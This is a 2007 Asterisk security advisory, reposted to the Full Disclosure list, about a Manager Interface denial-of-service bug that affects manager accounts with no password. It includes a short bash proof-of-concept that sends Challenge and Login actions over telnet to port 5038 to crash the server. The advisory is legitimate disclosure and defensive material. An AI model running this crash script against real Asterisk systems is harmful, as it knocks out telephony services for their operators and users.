Full Disclosure mailing list archives
ASA-2007-012: Remote Crash Vulnerability in Manager Interface
From: Asterisk Development Team <asteriskteam () digium com>
Date: Tue, 24 Apr 2007 18:24:32 -0500
Asterisk Project Security Advisory - ASA-2007-012 +------------------------------------------------------------------------+ | Product | Asterisk | |---------------------+--------------------------------------------------| | Summary | Remote Crash Vulnerability in Manager Interface | |---------------------+--------------------------------------------------| | Nature of Advisory | Denial of Service | |---------------------+--------------------------------------------------| | Susceptibility | Remote Unauthenticated Sessions | |---------------------+--------------------------------------------------| | Severity | Moderate | |---------------------+--------------------------------------------------| | Exploits Known | Yes | |---------------------+--------------------------------------------------| | Reported On | April 24, 2007 | |---------------------+--------------------------------------------------| | Reported By | Digium Technical Support | |---------------------+--------------------------------------------------| | Posted On | April 24, 2007 | |---------------------+--------------------------------------------------| | Last Updated On | April 24, 2007 | |---------------------+--------------------------------------------------| | Advisory Contact | russell () digium com | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | The Asterisk Manager Interface has a remote crash | | | vulnerability. If a manager user is configured in | | | manager.conf without a password, and then a connection | | | is made that attempts to use that username and MD5 | | | authentication, Asterisk will dereference a NULL pointer | | | and crash. | | | | | | This example script shows how the crash can be | | | triggered: | | | | | | #!/bin/bash | | | | | | function text1() { | | | | | | cat <<- EOF | | | | | | action: Challenge | | | | | | actionid: 0# | | | | | | authtype: MD5 | | | | | | EOF | | | | | | } | | | | | | function text2() { | | | | | | cat <<- EOF | | | | | | action: Login | | | | | | actionid: 1# | | | | | | key: textstringhere | | | | | | username: testuser | | | | | | authtype: MD5 | | | | | | EOF | | | | | | } | | | | | | (sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1 | | | 5038 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | The manager interface is not enabled by default. If it is | | | enabled, the only way this crash can be exploited is if a | | | user exists in manager.conf without a password. Given the | | | conditions necessary for this problem to be exploited, | | | the severity of this issue is marked as 'moderate'. | | | | | | All users of the Asterisk manager interface in affected | | | versions should ensure that there are no accounts in | | | manager.conf. Alternatively, the issue can be avoided by | | | completely disabling the manager interface. | | | | | | Users of the manager interface are encouraged to update | | | to the appropriate version of their Asterisk product | | | listed in the 'Corrected In' section below. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release | | | | Series | | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.0.x | All versions | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.2.x | All versions prior to | | | | 1.2.18 | |------------------------------+-------------+---------------------------| | Asterisk Open Source | 1.4.x | All versions prior to | | | | 1.4.3 | |------------------------------+-------------+---------------------------| | Asterisk Business Edition | A.x.x | All versions | |------------------------------+-------------+---------------------------| | Asterisk Business Edition | B.x.x | All versions up to and | | | | including B.1.3 | |------------------------------+-------------+---------------------------| | AsteriskNOW | pre-release | All version up to and | | | | including Beta5 | |------------------------------+-------------+---------------------------| | Asterisk Appliance Developer | 0.x.x | All versions prior to | | Kit | | 0.4.0 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |-------------------+----------------------------------------------------| | Asterisk Open | 1.2.18 and 1.4.3, available from | | Source | ftp://ftp.digium.com/pub/telephony/asterisk | |-------------------+----------------------------------------------------| | Asterisk Business | B.1.3.3, available from the Asterisk Business | | Edition | Edition user portal on http://www.digium.com or | | | via Digium Technical Support | |-------------------+----------------------------------------------------| | AsteriskNOW | Beta6, when available from | | | http://www.asterisknow.org/. Beta5 can use the | | | system update feature in the appliance control | | | panel. | |-------------------+----------------------------------------------------| | Asterisk | 0.4.0, available from | | Appliance | ftp://ftp.digium.com/pub/telephony/aadk/ | | Developer Kit | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security. | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://www.asterisk.org/files/ASA-2007-012.pdf. | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - ASA-2007-012 Copyright (c) 2007 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- ASA-2007-012: Remote Crash Vulnerability in Manager Interface Asterisk Development Team (Apr 24)